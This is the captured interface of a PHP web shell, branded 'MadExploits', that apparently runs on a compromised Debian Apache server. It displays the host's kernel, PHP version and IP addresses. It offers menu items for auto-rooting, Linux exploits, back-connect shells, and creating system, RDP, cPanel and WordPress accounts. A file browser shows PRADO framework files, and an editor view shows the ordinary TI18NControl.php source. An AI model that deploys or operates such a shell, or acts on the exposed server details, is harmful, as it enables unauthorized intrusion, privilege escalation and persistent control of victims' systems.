Linux polon 4.19.0-27-amd64 #1 SMP Debian 4.19.316-1 (2024-06-25) x86_64
Apache/2.4.59 (Debian)
: 10.2.73.233 | : 18.116.63.107
Cant Read [ /etc/named.conf ]
5.6.40-64+0~20230107.71+debian10~1.gbp673146
www-data
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
home /
ifk /
web /
prado4.3.2 /
I18N /
[ HOME SHELL ]
Name
Size
Permission
Action
core
[ DIR ]
drwxr-xr-x
schema
[ DIR ]
drwxr-xr-x
TChoiceFormat.php
3.49
KB
-rw-r--r--
TDateFormat.php
7.16
KB
-rw-r--r--
TGlobalization.php
9.13
KB
-rw-r--r--
TGlobalizationAutoDetect.php
4.16
KB
-rw-r--r--
TI18NControl.php
2.22
KB
-rw-r--r--
TNumberFormat.php
6.4
KB
-rw-r--r--
TTranslate.php
6.49
KB
-rw-r--r--
TTranslateParameter.php
2.68
KB
-rw-r--r--
Translation.php
2.66
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : TI18NControl.php
<?php /** * Base I18N component. * * @author Wei Zhuo <weizhuo[at]gmail[dot]com> * @link https://github.com/pradosoft/prado * @license https://github.com/pradosoft/prado/blob/master/LICENSE */ namespace Prado\I18N; use Prado\Web\UI\TControl; /** * TI18NControl class. * * Base class for I18N components, providing Culture and Charset properties. * * Properties * - <b>Culture</b>, string, * <br>Gets or sets the culture for formatting. If the Culture property * is not specified. The culture from the Application/Page is used. * - <b>Charset</b>, string, * <br>Gets or sets the charset for both input and output. * If the Charset property is not specified. The charset from the * Application/Page is used. The default is UTF-8. * * @author Xiang Wei Zhuo <weizhuo[at]gmail[dot]com> */ class TI18NControl extends TControl { /** * Gets the charset. * It is evaluated in the following order: * 1) application charset, * 2) the default charset in globalization * 3) UTF-8 * @return string charset */ public function getCharset() { $app = $this->getApplication()->getGlobalization(false); //instance charset $charset = $this->getViewState('Charset', ''); //fall back to globalization charset if (empty($charset)) { $charset = ($app === null) ? '' : $app->getCharset(); } //fall back to default charset if (empty($charset)) { $charset = ($app === null) ? 'UTF-8' : $app->getDefaultCharset(); } return $charset; } /** * Sets the charset for message output * @param string $value the charset, e.g. UTF-8 */ public function setCharset($value) { $this->setViewState('Charset', $value, ''); } /** * Get the specific culture for this control. * @return string culture identifier. */ public function getCulture() { $app = $this->getApplication()->getGlobalization(false); //instance charset $culture = $this->getViewState('Culture', ''); //fall back to globalization charset if (empty($culture)) { $culture = ($app === null) ? '' : $app->getCulture(); } return $culture; } /** * Get the custom culture identifier. * @param string $culture culture identifier. */ public function setCulture($culture) { $this->setViewState('Culture', $culture, ''); } }
Close